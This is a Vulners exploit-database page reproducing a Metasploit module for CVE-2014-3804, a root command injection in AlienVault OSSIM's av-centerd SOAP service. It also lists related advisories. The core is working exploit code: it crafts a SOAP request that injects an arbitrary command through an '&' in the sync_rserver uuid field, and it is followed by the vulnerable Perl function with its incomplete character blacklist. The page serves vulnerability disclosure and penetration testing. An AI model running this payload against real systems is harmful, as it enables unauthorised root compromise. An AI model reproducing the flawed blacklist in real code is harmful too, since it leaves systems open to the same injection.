Vulners
Lucene search
Alienvault OSSIM av-centerd Util.pm sync_rserver - Command Execution Exploit
| Reporter | Title | Published | Views | Family All 24 |
|---|---|---|---|---|
 | AlienVault OSSIM av-centerd Command Injection Exploit | 20 Jun 201400:00 | – | zdt |
 | CVE-2014-3804 | 24 Jun 201400:00 | – | circl |
 | AlienVault OSSIM av-centerd SOAP Requests Multiple Command Execution (CVE-2014-3804) | 14 Jul 201400:00 | – | checkpoint_advisories |
| AlienVault OSSIM av-centerd SOAP Requests Multiple Command Execution - ver 2 (CVE-2014-3804) | 3 Aug 201400:00 | – | checkpoint_advisories |
 | CVE-2014-3804 | 13 Jun 201414:00 | – | cve |
 | CVE-2014-3804 | 13 Jun 201414:00 | – | cvelist |
 | AlienVault OSSIM av-centerd Util.pm RCE | 20 Jun 201400:00 | – | dsquare |
 | Alienvault Open Source SIEM (OSSIM) - av-centerd Command Injection (Metasploit) | 24 Jun 201400:00 | – | exploitdb |
| Alienvault OSSIM av-centerd - Util.pm sync_rserver Command Execution (Metasploit) | 13 Sep 201700:00 | – | exploitdb |
 | Alienvault OSSIM av-centerd - Util.pm sync_rserver Command Execution (Metasploit) | 13 Sep 201700:00 | – | exploitpack |
10
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize
super(
'Name' => 'Alienvault OSSIM av-centerd Util.pm sync_rserver Command Execution',
'Description' => %q{
This module exploits a command injection vulnerability found within the sync_rserver
function in Util.pm. The vulnerability is triggered due to an incomplete blacklist
during the parsing of the $uuid parameter. This allows for the escaping of a system
command allowing for arbitrary command execution as root
},
'References' =>
[
[ 'CVE', '2014-3804' ],
[ 'ZDI', '14-197' ],
[ 'URL', 'http://forums.alienvault.com/discussion/2690' ],
],
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'DisclosureDate' => 'Jun 11 2014')
register_options([
Opt::RPORT(40007),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('CMD', [ false, 'This is the file to download', 'touch /tmp/file.txt'])
], self.class)
end
def run
soap = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n"
soap += "<soap:Envelope xmlns:soap=\"http:\/\/schemas.xmlsoap.org/soap/envelope/\"\r\n"
soap += "xmlns:soapenc=\"http:\/\/schemas.xmlsoap.org\/soap\/encoding/\" xmlns:xsd=\"http:\/\/www.w3.org\/2001\/XMLSchema\"\r\n"
soap += "xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\r\n"
soap += "soap:encodingStyle=\"http:\/\/schemas.xmlsoap.org\/soap\/encoding\/\">\r\n"
soap += "<soap:Body>\r\n"
soap += "<sync_rserver xmlns=\"AV\/CC\/Util\">\r\n"
soap += "<c-gensym3 xsi:type=\"xsd:string\">All</c-gensym3>\r\n"
soap += "<c-gensym5 xsi:type=\"xsd:string\">& #{datastore['CMD']} </c-gensym5>\r\n"
soap += "<c-gensym7 xsi:type=\"xsd:string\">#{datastore['RHOST']}</c-gensym7>\r\n"
soap += "<c-gensym9 xsi:type=\"xsd:string\">#{Rex::Text.rand_text_alpha(4 + rand(4))}</c-gensym9>\r\n"
soap += "</sync_rserver>\r\n"
soap += "</soap:Body>\r\n"
soap += "</soap:Envelope>\r\n"
res = send_request_cgi(
{
'uri' => '/av-centerd',
'method' => 'POST',
'ctype' => 'text/xml; charset=UTF-8',
'data' => soap,
'headers' => {
'SOAPAction' => "\"AV/CC/Util#sync_rserver\""
}
}, 20)
if res && res.code == 200
print_good("Command executed successfully!")
else
print_bad("Something went wrong...")
end
end
end
__END__
/usr/share/alienvault-center/lib/AV/CC/Util.pm
sub sync_rserver
{
my ( $funcion_llamada, $nombre, $uuid, $admin_ip, $hostname ) = @_;
verbose_log_file(
"SYNC RSERVER TASK : Received call from $uuid : ip source = $admin_ip, hostname = $hostname:($funcion_llamada,$nombre)"
);
if ($uuid =~ /[;`\$\<\>\|]/) {
console_log_file("Not allowed uuid: $uuid in sync_rserver\n");
my @ret = ("Error");
return \@ret;
}
my $conn = Avtools::get_database();
my $sqlfile = "/tmp/sync_${uuid}.sql";
my $sqlfile_old = "/tmp/sync_${uuid}.sql.old";
my $sqlfile_md5 = `md5sum $sqlfile | awk '{print \$1}'`;
my $sqlfile_content;
my $status = 1;
my $counter = 0;
my @ret;
my $query = qq{};
my $dbq;
if ( -f $sqlfile_old )
{
my $sqlfile_old_md5 = `md5sum $sqlfile_old | awk '{print \$1}'`;
debug_log_file ("Old MD5: $sqlfile_old_md5 New MD5: $sqlfile_md5");
if ( $sqlfile_md5 eq $sqlfile_old_md5 )
{
unlink $sqlfile;
verbose_log_file ("Already sync'ed!");
return "0";
}
else
{
unlink $sqlfile_old;
}
}
my $query_array = `ossim-db < $sqlfile 2>&1`;
$query_array =~ s/[\s\n]+$//g;
if ($query_array ne '')
{
$status = $query_array;
}
else
{
$status = 0;
}
if ( ! (defined $status) or $status == 0 )
{
if ( grep /RESTART\sOSSIM\-SERVER/, $sqlfile )
{
verbose_log_file("RESTART OSSIM-SERVER MARK found. Restarting ossim-server");
system('/etc/init.d/ossim-server restart');
}
else
{
debug_log_file("RESTART OSSIM-SERVER MARK not found. Skipping ossim-server restart");
}
$query = qq{REPLACE INTO alienvault.config (conf, value) VALUES ('latest_asset_change', utc_timestamp())};
debug_log_file($query);
$dbq = $conn->prepare($query);
$dbq->execute();
$dbq->finish();
}
else
{
verbose_log_file ("Error syncing rservers: ${status}");
}
debug_log_file("Move file: $sqlfile");
move ($sqlfile, $sqlfile . ".old");
# push @ret, "0";
return "0";
}
# 0day.today [2018-03-01] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Sep 2017 00:00Current
7.1High risk
Vulners AI Score7.1
EPSS0.79335